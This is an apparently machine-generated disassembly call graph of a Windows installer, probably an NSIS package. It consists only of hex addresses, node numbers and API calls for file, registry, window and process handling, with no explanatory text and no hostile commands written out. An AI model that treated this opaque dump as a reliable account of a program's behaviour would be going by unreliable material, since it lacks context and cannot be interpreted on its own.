4222->4271 4224 405dd6 4272 405d68 CharNextW CharNextW 4224->4272 4227 405b1a 4227->4143 4227->4144 4228 40667c 5 API calls 4234 405dec 4228->4234 4229 405e1d lstrlenW 4230 405e28 4229->4230 4229->4234 4231 405cbd 3 API calls 4230->4231 4233 405e2d GetFileAttributesW 4231->4233 4232 40672b 2 API calls 4232->4234 4233->4227 4234->4227 4234->4229 4234->4232 4235 405d09 2 API calls 4234->4235 4235->4229 4236->4148 4238 405d17 4237->4238 4239 405d29 4238->4239 4240 405d1d CharPrevW 4238->4240 4239->4151 4240->4238 4240->4239 4241->4169 4278 405eb9 GetFileAttributesW 4242->4278 4245 405ad5 DeleteFileW 4248 405adb 4245->4248 4246 405acd RemoveDirectoryW 4246->4248 4247 405adf 4247->4169 4248->4247 4249 405aeb SetFileAttributesW 4248->4249 4249->4247 4252 40546b 4250->4252 4260 40550d 4250->4260 4251 405487 lstrlenW 4253 4054b0 4251->4253 4254 405495 lstrlenW 4251->4254 4252->4251 4255 40640a 17 API calls 4252->4255 4257 4054c3 4253->4257 4258 4054b6 SetWindowTextW 4253->4258 4256 4054a7 lstrcatW 4254->4256 4254->4260 4255->4251 4256->4253 4259 4054c9 SendMessageW SendMessageW SendMessageW 4257->4259 4257->4260 4258->4257 4259->4260 4260->4169 4262 4061cf 4261->4262 4263 4061c2 4261->4263 4262->4169 4281 406034 4263->4281 4266 406741 FindClose 4265->4266 4267 405c7e 4265->4267 4266->4267 4267->4145 4267->4157 4269 405c88 4268->4269 4270 405cd9 lstrcatW 4268->4270 4269->4163 4270->4269 4271->4224 4273 405d85 4272->4273 4276 405d97 4272->4276 4274 405d92 CharNextW 4273->4274 4273->4276 4277 405dbb 4274->4277 4275 405cea CharNextW 4275->4276 4276->4275 4276->4277 4277->4227 4277->4228 4279 405abe 4278->4279 4280 405ecb SetFileAttributesW 4278->4280 4279->4245 4279->4246 4279->4247 4280->4279 4282 406064 4281->4282 4283 40608a GetShortPathNameW 4281->4283 4308 405ede GetFileAttributesW CreateFileW 4282->4308 4285 4061a9 4283->4285 4286 40609f 4283->4286 4285->4262 4286->4285 4288 4060a7 wsprintfA 4286->4288 4287 40606e CloseHandle GetShortPathNameW 4287->4285 4289 406082 4287->4289 4290 40640a 17 API calls 4288->4290 4289->4283 4289->4285 4291 4060cf 4290->4291 4309 405ede GetFileAttributesW CreateFileW 4291->4309 4293 4060dc 4293->4285 4294 4060eb GetFileSize GlobalAlloc 4293->4294 4295 4061a2 CloseHandle 4294->4295 4296 40610d 4294->4296 4295->4285 4310 405f61 ReadFile 4296->4310 4301 406140 4303 405e43 4 API calls 4301->4303 4302 40612c lstrcpyA 4304 40614e 4302->4304 4303->4304 4305 406185 SetFilePointer 4304->4305 4317 405f90 WriteFile 4305->4317 4308->4287 4309->4293 4311 405f7f 4310->4311 4311->4295 4312 405e43 lstrlenA 4311->4312 4313 405e84 lstrlenA 4312->4313 4314 405e8c 4313->4314 4315 405e5d lstrcmpiA 4313->4315 4314->4301 4314->4302 4315->4314 4316 405e7b CharNextA 4315->4316 4316->4313 4318 405fae GlobalFree 4317->4318 4318->4295 4319 4015c1 4320 402c41 17 API calls 4319->4320 4321 4015c8 4320->4321 4322 405d68 4 API calls 4321->4322 4332 4015d1 4322->4332 4323 401631 4325 401663 4323->4325 4326 401636 4323->4326 4324 405cea CharNextW 4324->4332 4328 401423 24 API calls 4325->4328 4346 401423 4326->4346 4335 40165b 4328->4335 4332->4323 4332->4324 4336 401617 GetFileAttributesW 4332->4336 4338 4059b9 4332->4338 4341 40591f CreateDirectoryW 4332->4341 4350 40599c CreateDirectoryW 4332->4350 4334 40164a SetCurrentDirectoryW 4334->4335 4336->4332 4353 4067c2 GetModuleHandleA 4338->4353 4342 405970 GetLastError 4341->4342 4343 40596c 4341->4343 4342->4343 4344 40597f SetFileSecurityW 4342->4344 4343->4332 4344->4343 4345 405995 GetLastError 4344->4345 4345->4343 4347 405450 24 API calls 4346->4347 4348 401431 4347->4348 4349 4063e8 lstrcpynW 4348->4349 4349->4334 4351 4059b0 GetLastError 4350->4351 4352 4059ac 4350->4352 4351->4352 4352->4332 4354 4067e8 GetProcAddress 4353->4354 4355 4067de 4353->4355 4357 4059c0 4354->4357 4359 406752 GetSystemDirectoryW 4355->4359 4357->4332 4358 4067e4 4358->4354 4358->4357 4361 406774 wsprintfW LoadLibraryExW 4359->4361 4361->4358 4365 4053c4 4366 4053d4 4365->4366 4367 4053e8 4365->4367 4368 4053da 4366->4368 4378 405431 4366->4378 4369 4053f0 IsWindowVisible 4367->4369 4376 405410 4367->4376 4379 4043ab 4368->4379 4370 4053fd 4369->4370 4369->4378 4382 404d1a SendMessageW 4370->4382 4371 405436 CallWindowProcW 4374 4053e4 4371->4374 4376->4371 4387 404d9a 4376->4387 4378->4371 4380 4043c3 4379->4380 4381 4043b4 SendMessageW 4379->4381 4380->4374 4381->4380 4383 404d79 SendMessageW 4382->4383 4384 404d3d GetMessagePos ScreenToClient SendMessageW 4382->4384 4385 404d71 4383->4385 4384->4385 4386 404d76 4384->4386 4385->4376 4386->4383 4396 4063e8 lstrcpynW 4387->4396 4389 404dad 4397 40632f wsprintfW 4389->4397 4391 404db7 4398 40140b 4391->4398 4395 404dc7 4395->4378 4396->4389 4397->4391 4402 401389 4398->4402 4401 4063e8 lstrcpynW 4401->4395 4404 401390 4402->4404 4403 4013fe 4403->4401 4404->4403 4405 4013cb MulDiv SendMessageW 4404->4405 4405->4404 4850 401e49 4851 402c1f 17 API calls 4850->4851 4852 401e4f 4851->4852 4853 402c1f 17 API calls 4852->4853 4854 401e5b 4853->4854 4855 401e72 EnableWindow 4854->4855 4856 401e67 ShowWindow 4854->4856 4857 402ac5 4855->4857 4856->4857 4858 40264a 4859 402c1f 17 API calls 4858->4859 4860 402659 4859->4860 4861 4026a3 ReadFile 4860->4861 4862 405f61 ReadFile 4860->4862 4863 4026e3 MultiByteToWideChar 4860->4863 4864 402798 4860->4864 4867 40273c 4860->4867 4868 402709 SetFilePointer MultiByteToWideChar 4860->4868 4869 4027a9 4860->4869 4871 402796 4860->4871 4861->4860 4861->4871 4862->4860 4863->4860 4881 40632f wsprintfW 4864->4881 4867->4860 4867->4871 4872 405fbf SetFilePointer 4867->4872 4868->4860 4870 4027ca SetFilePointer 4869->4870 4869->4871 4870->4871 4873 405ff3 4872->4873 4874 405fdb 4872->4874 4873->4867 4875 405f61 ReadFile 4874->4875 4876 405fe7 4875->4876 4876->4873 4877 406024 SetFilePointer 4876->4877 4878 405ffc SetFilePointer 4876->4878 4877->4873 4878->4877 4879 406007 4878->4879 4880 405f90 WriteFile 4879->4880 4880->4873 4881->4871 4882 404dcc GetDlgItem GetDlgItem 4883 404e1e 7 API calls 4882->4883 4886 405037 4882->4886 4884 404ec1 DeleteObject 4883->4884 4885 404eb4 SendMessageW 4883->4885 4887 404eca 4884->4887 4885->4884 4893 40511b 4886->4893 4895 4050fc 4886->4895 4899 405097 4886->4899 4888 404ed9 4887->4888 4889 404f01 4887->4889 4891 40640a 17 API calls 4888->4891 4892 40435f 18 API calls 4889->4892 4890 4051c7 4896 4051d1 SendMessageW 4890->4896 4897 4051d9 4890->4897 4898 404ee3 SendMessageW SendMessageW 4891->4898 4900 404f15 4892->4900 4893->4890 4894 4053af 4893->4894 4901 405174 SendMessageW 4893->4901 4902 4043c6 8 API calls 4894->4902 4895->4893 4903 40510d SendMessageW 4895->4903 4896->4897 4909 4051f2 4897->4909 4910 4051eb ImageList_Destroy 4897->4910 4914 405202 4897->4914 4898->4887 4904 404d1a 5 API calls 4899->4904 4905 40435f 18 API calls 4900->4905 4901->4894 4907 405189 SendMessageW 4901->4907 4908 4053bd 4902->4908 4903->4893 4917 4050a8 4904->4917 4918 404f23 4905->4918 4906 405371 4906->4894 4915 405383 ShowWindow GetDlgItem ShowWindow 4906->4915 4912 40519c 4907->4912 4913 4051fb GlobalFree 4909->4913 4909->4914 4910->4909 4911 404ff8 GetWindowLongW SetWindowLongW 4916 405011 4911->4916 4923 4051ad SendMessageW 4912->4923 4913->4914 4914->4906 4928 404d9a 4 API calls 4914->4928 4933 40523d 4914->4933 4915->4894 4919 405017 ShowWindow 4916->4919 4920 40502f 4916->4920 4917->4895 4918->4911 4922 404f73 SendMessageW 4918->4922 4924 404ff2 4918->4924 4926 404fc0 SendMessageW 4918->4926 4927 404faf SendMessageW 4918->4927 4938 404394 SendMessageW 4919->4938 4939 404394 SendMessageW 4920->4939 4922->4918 4923->4890 4924->4911 4924->4916 4926->4918 4927->4918 4928->4933 4929 40502a 4929->4894 4930 405347 InvalidateRect 4930->4906 4931 40535d 4930->4931 4940 404cd5 4931->4940 4932 40526b SendMessageW 4934 405281 4932->4934 4933->4932 4933->4934 4934->4930 4935 4052e2 4934->4935 4937 4052f5 SendMessageW SendMessageW 4934->4937 4935->4937 4937->4934 4938->4929 4939->4886 4943 404c0c 4940->4943 4942 404cea 4942->4906 4944 404c25 4943->4944 4945 40640a 17 API calls 4944->4945 4946 404c89 4945->4946 4947 40640a 17 API calls 4946->4947 4948 404c94 4947->4948 4949 40640a 17 API calls 4948->4949 4950 404caa lstrlenW wsprintfW SetDlgItemTextW 4949->4950 4950->4942 5256 6cf122fd 5257 6cf12367 5256->5257 5258 6cf12372 GlobalAlloc 5257->5258 5259 6cf12391 5257->5259 5258->5257 5260 4016cc 5261 402c41 17 API calls 5260->5261 5262 4016d2 GetFullPathNameW 5261->5262 5263 4016ec 5262->5263 5269 40170e 5262->5269 5265 40672b 2 API calls 5263->5265 5263->5269 5264 401723 GetShortPathNameW 5266 402ac5 5264->5266 5267 4016fe 5265->5267 5267->5269 5270 4063e8 lstrcpynW 5267->5270 5269->5264 5269->5266 5270->5269 5271 40234e 5272 402c41 17 API calls 5271->5272 5273 40235d 5272->5273 5274 402c41 17 API calls 5273->5274 5275 402366 5274->5275 5276 402c41 17 API calls 5275->5276 5277 402370 GetPrivateProfileStringW 5276->5277 5278 4044cf lstrlenW 5279 4044f0 WideCharToMultiByte 5278->5279 5280 4044ee 5278->5280 5280->5279 5281 404850 5282 40487c 5281->5282 5283 40488d 5281->5283 5342 405a32 GetDlgItemTextW 5282->5342 5284 404899 GetDlgItem 5283->5284 5287 4048f8 5283->5287 5286 4048ad 5284->5286 5290 4048c1 SetWindowTextW 5286->5290 5293 405d68 4 API calls 5286->5293 5295 40640a 17 API calls 5287->5295 5304 4049dc 5287->5304 5340 404b8b 5287->5340 5288 404887 5289 40667c 5 API calls 5288->5289 5289->5283 5294 40435f 18 API calls 5290->5294 5292 4043c6 8 API calls 5297 404b9f 5292->5297 5298 4048b7 5293->5298 5299 4048dd 5294->5299 5300 40496c SHBrowseForFolderW 5295->5300 5296 404a0c 5301 405dc5 18 API calls 5296->5301 5298->5290 5306 405cbd 3 API calls 5298->5306 5302 40435f 18 API calls 5299->5302 5303 404984 CoTaskMemFree 5300->5303 5300->5304 5305 404a12 5301->5305 5307 4048eb 5302->5307 5308 405cbd 3 API calls 5303->5308 5304->5340 5344 405a32 GetDlgItemTextW 5304->5344 5345 4063e8 lstrcpynW 5305->5345 5306->5290 5343 404394 SendMessageW 5307->5343 5310 404991 5308->5310 5313 4049c8 SetDlgItemTextW 5310->5313 5317 40640a 17 API calls 5310->5317 5312 4048f1 5316 4067c2 5 API calls 5312->5316 5313->5304 5314 404a29 5315 4067c2 5 API calls 5314->5315 5323 404a30 5315->5323 5316->5287 5318 4049b0 lstrcmpiW 5317->5318 5318->5313 5320 4049c1 lstrcatW 5318->5320 5319 404a71 5346 4063e8 lstrcpynW 5319->5346 5320->5313 5322 404a78 5324 405d68 4 API calls 5322->5324 5323->5319 5328 405d09 2 API calls 5323->5328 5329 404ac9 5323->5329 5325 404a7e GetDiskFreeSpaceW 5324->5325 5327 404aa2 MulDiv 5325->5327 5325->5329 5327->5329 5328->5323 5330 404b3a 5329->5330 5332 404cd5 20 API calls 5329->5332 5331 404b5d 5330->5331 5333 40140b 2 API calls 5330->5333 5347 404381 EnableWindow 5331->5347 5334 404b27 5332->5334 5333->5331 5335 404b3c SetDlgItemTextW 5334->5335 5336 404b2c 5334->5336 5335->5330 5338 404c0c 20 API calls 5336->5338 5338->5330 5339 404b79 5339->5340 5348 4047a9 5339->5348 5340->5292 5342->5288 5343->5312 5344->5296 5345->5314 5346->5322 5347->5339 5349 4047b7 5348->5349 5350 4047bc SendMessageW 5348->5350 5349->5350 5350->5340 5351 6cf110e1 5360 6cf11111 5351->5360 5352 6cf111d8 GlobalFree 5353 6cf112ba 2 API calls 5353->5360 5354 6cf111d3 5354->5352 5355 6cf11164 GlobalAlloc 5355->5360 5356 6cf111f8 GlobalFree 5356->5360 5357 6cf11272 2 API calls 5359 6cf111c4 GlobalFree 5357->5359 5358 6cf112e1 lstrcpyW 5358->5360 5359->5360 5360->5352 5360->5353 5360->5354 5360->5355 5360->5356 5360->5357 5360->5358 5360->5359 5361 401b53 5362 402c41 17 API calls 5361->5362 5363 401b5a 5362->5363 5364 402c1f 17 API calls 5363->5364 5365 401b63 wsprintfW 5364->5365 5366 402ac5 5365->5366 5367 401956 5368 402c41 17 API calls 5367->5368 5369 40195d lstrlenW 5368->5369 5370 402592 5369->5370 5378 4014d7 5379 402c1f 17 API calls 5378->5379 5380 4014dd Sleep 5379->5380 5382 402ac5 5380->5382 5383 401f58 5384 402c41 17 API calls 5383->5384 5385 401f5f 5384->5385 5386 40672b 2 API calls 5385->5386 5387 401f65 5386->5387 5389 401f76 5387->5389 5390 40632f wsprintfW 5387->5390 5390->5389 5391 402259 5392 402c41 17 API calls 5391->5392 5393 40225f 5392->5393 5394 402c41 17 API calls 5393->5394 5395 402268 5394->5395 5396 402c41 17 API calls 5395->5396 5397 402271 5396->5397 5398 40672b 2 API calls 5397->5398 5399 40227a 5398->5399 5400 40228b lstrlenW lstrlenW 5399->5400 5404 40227e 5399->5404 5402 405450 24 API calls 5400->5402 5401 405450 24 API calls 5405 402286 5401->5405 5403 4022c9 SHFileOperationW 5402->5403 5403->5404 5403->5405 5404->5401 5247 40175c 5248 402c41 17 API calls 5247->5248 5249 401763 5248->5249 5250 405f0d 2 API calls 5249->5250 5251 40176a 5250->5251 5252 405f0d 2 API calls 5251->5252 5252->5251 5406 6cf1166d 5412 6cf11516 5406->5412 5408 6cf116cb GlobalFree 5409 6cf11685 5409->5408 5410 6cf116a0 5409->5410 5411 6cf116b7 VirtualFree 5409->5411 5410->5408 5411->5408 5414 6cf1151c 5412->5414 5413 6cf11522 5413->5409 5414->5413 5415 6cf1152e GlobalFree 5414->5415 5415->5409 5416 401d5d GetDlgItem GetClientRect 5417 402c41 17 API calls 5416->5417 5418 401d8f LoadImageW SendMessageW 5417->5418 5419 401dad DeleteObject 5418->5419 5420 402ac5 5418->5420 5419->5420 5421 4022dd 5422 4022e4 5421->5422 5424 4022f7 5421->5424 5423 40640a 17 API calls 5422->5423 5425 4022f1 5423->5425 5426 405a4e MessageBoxIndirectW 5425->5426 5426->5424 5427 401563 5428 402a6b 5427->5428 5431 40632f wsprintfW 5428->5431 5430 402a70 5431->5430 4406 4023e4 4407 402c41 17 API calls 4406->4407 4408 4023f6 4407->4408 4409 402c41 17 API calls 4408->4409 4410 402400 4409->4410 4423 402cd1 4410->4423 4413 40288b 4414 402438 4416 402444 4414->4416 4427 402c1f 4414->4427 4415 402c41 17 API calls 4417 40242e lstrlenW 4415->4417 4419 402463 RegSetValueExW 4416->4419 4430 4031d6 4416->4430 4417->4414 4421 402479 RegCloseKey 4419->4421 4421->4413 4424 402cec 4423->4424 4445 406283 4424->4445 4428 40640a 17 API calls 4427->4428 4429 402c34 4428->4429 4429->4416 4431 403201 4430->4431 4432 4031e5 SetFilePointer 4430->4432 4449 4032de GetTickCount 4431->4449 4432->4431 4435 405f61 ReadFile 4436 403221 4435->4436 4437 4032de 42 API calls 4436->4437 4444 40329e 4436->4444 4438 403238 4437->4438 4439 4032a4 ReadFile 4438->4439 4442 403247 4438->4442 4438->4444 4439->4444 4441 405f61 ReadFile 4441->4442 4442->4441 4443 405f90 WriteFile 4442->4443 4442->4444 4443->4442 4444->4419 4446 406292 4445->4446 4447 402410 4446->4447 4448 40629d RegCreateKeyExW 4446->4448 4447->4413 4447->4414 4447->4415 4448->4447 4450 403436 4449->4450 4451 40330c 4449->4451 4452 402e8e 32 API calls 4450->4452 4462 40345d SetFilePointer 4451->4462 4458 403208 4452->4458 4454 403317 SetFilePointer 4460 40333c 4454->4460 4458->4435 4458->4444 4459 405f90 WriteFile 4459->4460 4460->4458 4460->4459 4461 403417 SetFilePointer 4460->4461 4463 403447 4460->4463 4466 406943 4460->4466 4473 402e8e 4460->4473 4461->4450 4462->4454 4464 405f61 ReadFile 4463->4464 4465 40345a 4464->4465 4465->4460 4467 406968 4466->4467 4468 406970 4466->4468 4467->4460 4468->4467 4469 406a00 GlobalAlloc 4468->4469 4470 4069f7 GlobalFree 4468->4470 4471 406a77 GlobalAlloc 4468->4471 4472 406a6e GlobalFree 4468->4472 4469->4467 4469->4468 4470->4469 4471->4467 4471->4468 4472->4471 4474 402eb7 4473->4474 4475 402e9f 4473->4475 4477 402ec7 GetTickCount 4474->4477 4478 402ebf 4474->4478 4476 402ea8 DestroyWindow 4475->4476 4482 402eaf 4475->4482 4476->4482 4479 402ed5 4477->4479 4477->4482 4488 4067fe 4478->4488 4481 402f0a CreateDialogParamW ShowWindow 4479->4481 4483 402edd 4479->4483 4481->4482 4482->4460 4483->4482 4492 402e72 4483->4492 4485 402eeb wsprintfW 4486 405450 24 API calls 4485->4486 4487 402f08 4486->4487 4487->4482 4489 40681b PeekMessageW 4488->4489 4490 406811 DispatchMessageW 4489->4490 4491 40682b 4489->4491 4490->4489 4491->4482 4493 402e81 4492->4493 4494 402e83 MulDiv 4492->4494 4493->4494 4494->4485 5432 6cf116d4 5433 6cf11703 5432->5433 5434 6cf11b5f 22 API calls 5433->5434 5435 6cf1170a 5434->5435 5436 6cf11711 5435->5436 5437 6cf1171d 5435->5437 5438 6cf11272 2 API calls 5436->5438 5439 6cf11744 5437->5439 5440 6cf11727 5437->5440 5443 6cf1171b 5438->5443 5441 6cf1174a 5439->5441 5442 6cf1176e 5439->5442 5444 6cf1153d 3 API calls 5440->5444 5445 6cf115b4 3 API calls 5441->5445 5446 6cf1153d 3 API calls 5442->5446 5447 6cf1172c 5444->5447 5449 6cf1174f 5445->5449 5446->5443 5448 6cf115b4 3 API calls 5447->5448 5450 6cf11732 5448->5450 5451 6cf11272 2 API calls 5449->5451 5452 6cf11272 2 API calls 5450->5452 5453 6cf11755 GlobalFree 5451->5453 5454 6cf11738 GlobalFree 5452->5454 5453->5443 5455 6cf11769 GlobalFree 5453->5455 5454->5443 5455->5443 5463 6cf12c57 5464 6cf12c6f 5463->5464 5465 6cf1158f 2 API calls 5464->5465 5466 6cf12c8a 5465->5466 5467 402868 5468 402c41 17 API calls 5467->5468 5469 40286f FindFirstFileW 5468->5469 5470 402897 5469->5470 5474 402882 5469->5474 5475 40632f wsprintfW 5470->5475 5472 4028a0 5476 4063e8 lstrcpynW 5472->5476 5475->5472 5476->5474 5477 6cf118d9 5479 6cf118fc 5477->5479 5478 6cf11943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5481 6cf11272 2 API calls 5478->5481 5479->5478 5480 6cf11931 GlobalFree 5479->5480 5480->5478 5482 6cf11ace GlobalFree GlobalFree 5481->5482 5483 401968 5484 402c1f 17 API calls 5483->5484 5485 40196f 5484->5485 5486 402c1f 17 API calls 5485->5486 5487 40197c 5486->5487 5488 402c41 17 API calls 5487->5488 5489 401993 lstrlenW 5488->5489 5491 4019a4 5489->5491 5490 4019e5 5491->5490 5495 4063e8 lstrcpynW 5491->5495 5493 4019d5 5493->5490 5494 4019da lstrlenW 5493->5494 5494->5490 5495->5493 5496 6cf11058 5498 6cf11074 5496->5498 5497 6cf110dd 5498->5497 5499 6cf11092 5498->5499 5500 6cf11516 GlobalFree 5498->5500 5501 6cf11516 GlobalFree 5499->5501 5500->5499 5502 6cf110a2 5501->5502 5503 6cf110b2 5502->5503 5504 6cf110a9 GlobalSize 5502->5504 5505 6cf110b6 GlobalAlloc 5503->5505 5506 6cf110c7 5503->5506 5504->5503 5507 6cf1153d 3 API calls 5505->5507 5508 6cf110d2 GlobalFree 5506->5508 5507->5506 5508->5497 5509 40166a 5510 402c41 17 API calls 5509->5510 5511 401670 5510->5511 5512 40672b 2 API calls 5511->5512 5513 401676 5512->5513 4980 40176f 4981 402c41 17 API calls 4980->4981 4982 401776 4981->4982 4983 401796 4982->4983 4984 40179e 4982->4984 5020 4063e8 lstrcpynW 4983->5020 5021 4063e8 lstrcpynW 4984->5021 4987 40179c 4991 40667c 5 API calls 4987->4991 4988 4017a9 4989 405cbd 3 API calls 4988->4989 4990 4017af lstrcatW 4989->4990 4990->4987 5009 4017bb 4991->5009 4992 4017f7 4994 405eb9 2 API calls 4992->4994 4993 40672b 2 API calls 4993->5009 4994->5009 4996 4017cd CompareFileTime 4996->5009 4997 40188d 4998 405450 24 API calls 4997->4998 5001 401897 4998->5001 4999 405450 24 API calls 5008 401879 4999->5008 5000 4063e8 lstrcpynW 5000->5009 5002 4031d6 44 API calls 5001->5002 5003 4018aa 5002->5003 5004 4018be SetFileTime 5003->5004 5005 4018d0 CloseHandle 5003->5005 5004->5005 5007 4018e1 5005->5007 5005->5008 5006 40640a 17 API calls 5006->5009 5010 4018e6 5007->5010 5011 4018f9 5007->5011 5009->4992 5009->4993 5009->4996 5009->4997 5009->5000 5009->5006 5014 405a4e MessageBoxIndirectW 5009->5014 5018 401864 5009->5018 5019 405ede GetFileAttributesW CreateFileW 5009->5019 5012 40640a 17 API calls 5010->5012 5013 40640a 17 API calls 5011->5013 5015 4018ee lstrcatW 5012->5015 5016 401901 5013->5016 5014->5009 5015->5016 5017 405a4e MessageBoxIndirectW 5016->5017 5017->5008 5018->4999 5018->5008 5019->5009 5020->4987 5021->4988 5022 4027ef 5023 402a70 5022->5023 5024 4027f6 5022->5024 5025 402c1f 17 API calls 5024->5025 5026 4027fd 5025->5026 5027 40280c SetFilePointer 5026->5027 5027->5023 5028 40281c 5027->5028 5030 40632f wsprintfW 5028->5030 5030->5023 5514 401a72 5515 402c1f 17 API calls 5514->5515 5516 401a7b 5515->5516 5517 402c1f 17 API calls 5516->5517 5518 401a20 5517->5518 5519 406af2 5525 406976 5519->5525 5520 4072e1 5521 406a00 GlobalAlloc 5521->5520 5521->5525 5522 4069f7 GlobalFree 5522->5521 5523 406a77 GlobalAlloc 5523->5520 5523->5525 5524 406a6e GlobalFree 5524->5523 5525->5520 5525->5521 5525->5522 5525->5523 5525->5524 5526 401573 5527 401583 ShowWindow 5526->5527 5528 40158c 5526->5528 5527->5528 5529 40159a ShowWindow 5528->5529 5530 402ac5 5528->5530 5529->5530 5531 401cf3 5532 402c1f 17 API calls 5531->5532 5533 401cf9 IsWindow 5532->5533 5534 401a20 5533->5534 5535 402df3 5536 402e05 SetTimer 5535->5536 5537 402e1e 5535->5537 5536->5537 5538 402e6c 5537->5538 5539 402e72 MulDiv 5537->5539 5540 402e2c wsprintfW SetWindowTextW SetDlgItemTextW 5539->5540 5540->5538 5542 4014f5 SetForegroundWindow 5543 402ac5 5542->5543 5544 402576 5545 402c41 17 API calls 5544->5545 5546 40257d 5545->5546 5549 405ede GetFileAttributesW CreateFileW 5546->5549 5548 402589 5549->5548 5550 401b77 5551 401bc8 5550->5551 5555 401b84 5550->5555 5552 401bf2 GlobalAlloc 5551->5552 5553 401bcd 5551->5553 5557 40640a 17 API calls 5552->5557 5563 4022f7 5553->5563 5571 4063e8 lstrcpynW 5553->5571 5554 401c0d 5556 40640a 17 API calls 5554->5556 5554->5563 5555->5554 5558 401b9b 5555->5558 5560 4022f1 5556->5560 5557->5554 5569 4063e8 lstrcpynW 5558->5569 5565 405a4e MessageBoxIndirectW 5560->5565 5562 401bdf GlobalFree 5562->5563 5564 401baa 5570 4063e8 lstrcpynW 5564->5570 5565->5563 5567 401bb9 5572 4063e8 lstrcpynW 5567->5572 5569->5564 5570->5567 5571->5562 5572->5563 5222 4024f8 5223 402c81 17 API calls 5222->5223 5224 402502 5223->5224 5225 402c1f 17 API calls 5224->5225 5226 40250b 5225->5226 5227 402533 RegEnumValueW 5226->5227 5228 402527 RegEnumKeyW 5226->5228 5229 40288b 5226->5229 5230 40254f RegCloseKey 5227->5230 5231 402548 5227->5231 5228->5230 5230->5229 5231->5230 5233 40167b 5234 402c41 17 API calls 5233->5234 5235 401682 5234->5235 5236 402c41 17 API calls 5235->5236 5237 40168b 5236->5237 5238 402c41 17 API calls 5237->5238 5239 401694 MoveFileW 5238->5239 5240 4016a0 5239->5240 5241 4016a7 5239->5241 5243 401423 24 API calls 5240->5243 5242 40672b 2 API calls 5241->5242 5245 402250 5241->5245 5244 4016b6 5242->5244 5243->5245 5244->5245 5246 4061ae 36 API calls 5244->5246 5246->5240 5580 401e7d 5581 402c41 17 API calls 5580->5581 5582 401e83 5581->5582 5583 402c41 17 API calls 5582->5583 5584 401e8c 5583->5584 5585 402c41 17 API calls 5584->5585 5586 401e95 5585->5586 5587 402c41 17 API calls 5586->5587 5588 401e9e 5587->5588 5589 401423 24 API calls 5588->5589 5590 401ea5 5589->5590 5597 405a14 ShellExecuteExW 5590->5597 5592 401ee7 5594 40288b 5592->5594 5598 406873 WaitForSingleObject 5592->5598 5595 401f01 CloseHandle 5595->5594 5597->5592 5599 40688d 5598->5599 5600 40689f GetExitCodeProcess 5599->5600 5601 4067fe 2 API calls 5599->5601 5600->5595 5602 406894 WaitForSingleObject 5601->5602 5602->5599 5603 4019ff 5604 402c41 17 API calls 5603->5604 5605 401a06 5604->5605 5606 402c41 17 API calls 5605->5606 5607 401a0f 5606->5607 5608 401a16 lstrcmpiW 5607->5608 5609 401a28 lstrcmpW 5607->5609 5610 401a1c 5608->5610 5609->5610 5611 401000 5612 401037 BeginPaint GetClientRect 5611->5612 5613 40100c DefWindowProcW 5611->5613 5615 4010f3 5612->5615 5616 401179 5613->5616 5617 401073 CreateBrushIndirect FillRect DeleteObject 5615->5617 5618 4010fc 5615->5618 5617->5615 5619 401102 CreateFontIndirectW 5618->5619 5620 401167 EndPaint 5618->5620 5619->5620 5621 401112 6 API calls 5619->5621 5620->5616 5621->5620 5622 401503 5623 40150b 5622->5623 5625 40151e 5622->5625 5624 402c1f 17 API calls 5623->5624 5624->5625 4495 402484 4506 402c81 4495->4506 4498 402c41 17 API calls 4499 402497 4498->4499 4500 4024a2 RegQueryValueExW 4499->4500 4503 40288b 4499->4503 4501 4024c8 RegCloseKey 4500->4501 4502 4024c2 4500->4502 4501->4503 4502->4501 4511 40632f wsprintfW 4502->4511 4507 402c41 17 API calls 4506->4507 4508 402c98 4507->4508 4509 406255 RegOpenKeyExW 4508->4509 4510 40248e 4509->4510 4510->4498 4511->4501 5626 402104 5627 402c41 17 API calls 5626->5627 5628 40210b 5627->5628 5629 402c41 17 API calls 5628->5629 5630 402115 5629->5630 5631 402c41 17 API calls 5630->5631 5632 40211f 5631->5632 5633 402c41 17 API calls 5632->5633 5634 402129 5633->5634 5635 402c41 17 API calls 5634->5635 5637 402133 5635->5637 5636 402172 CoCreateInstance 5641 402191 5636->5641 5637->5636 5638 402c41 17 API calls 5637->5638 5638->5636 5639 401423 24 API calls 5640 402250 5639->5640 5641->5639 5641->5640 4755 403e86 4756 403fd9 4755->4756 4757 403e9e 4755->4757 4759 403fea GetDlgItem GetDlgItem 4756->4759 4774 40402a 4756->4774 4757->4756 4758 403eaa 4757->4758 4760 403eb5 SetWindowPos 4758->4760 4761 403ec8 4758->4761 4762 40435f 18 API calls 4759->4762 4760->4761 4765 403ee5 4761->4765 4766 403ecd ShowWindow 4761->4766 4767 404014 SetClassLongW 4762->4767 4763 404084 4764 4043ab SendMessageW 4763->4764 4772 403fd4 4763->4772 4793 404096 4764->4793 4768 403f07 4765->4768 4769 403eed DestroyWindow 4765->4769 4766->4765 4770 40140b 2 API calls 4767->4770 4775 403f0c SetWindowLongW 4768->4775 4776 403f1d 4768->4776 4773 404309 4769->4773 4770->4774 4771 401389 2 API calls 4777 40405c 4771->4777 4773->4772 4786 404319 ShowWindow 4773->4786 4774->4763 4774->4771 4775->4772 4778 403fc6 4776->4778 4779 403f29 GetDlgItem 4776->4779 4777->4763 4780 404060 SendMessageW 4777->4780 4836 4043c6 4778->4836 4783 403f59 4779->4783 4784 403f3c SendMessageW IsWindowEnabled 4779->4784 4780->4772 4781 40140b 2 API calls 4781->4793 4782 4042ea DestroyWindow EndDialog 4782->4773 4788 403f66 4783->4788 4790 403fad SendMessageW 4783->4790 4791 403f79 4783->4791 4800 403f5e 4783->4800 4784->4772 4784->4783 4786->4772 4787 40640a 17 API calls 4787->4793 4788->4790 4788->4800 4790->4778 4794 403f81 4791->4794 4795 403f96 4791->4795 4792 403f94 4792->4778 4793->4772 4793->4781 4793->4782 4793->4787 4796 40435f 18 API calls 4793->4796 4817 40422a DestroyWindow 4793->4817 4827 40435f 4793->4827 4798 40140b 2 API calls 4794->4798 4797 40140b 2 API calls 4795->4797 4796->4793 4799 403f9d 4797->4799 4798->4800 4799->4778 4799->4800 4833 404338 4800->4833 4802 404111 GetDlgItem 4803 404126 4802->4803 4804 40412e ShowWindow KiUserCallbackDispatcher 4802->4804 4803->4804 4830 404381 EnableWindow 4804->4830 4806 404158 EnableWindow 4811 40416c 4806->4811 4807 404171 GetSystemMenu EnableMenuItem SendMessageW 4808 4041a1 SendMessageW 4807->4808 4807->4811 4808->4811 4810 403e67 18 API calls 4810->4811 4811->4807 4811->4810 4831 404394 SendMessageW 4811->4831 4832 4063e8 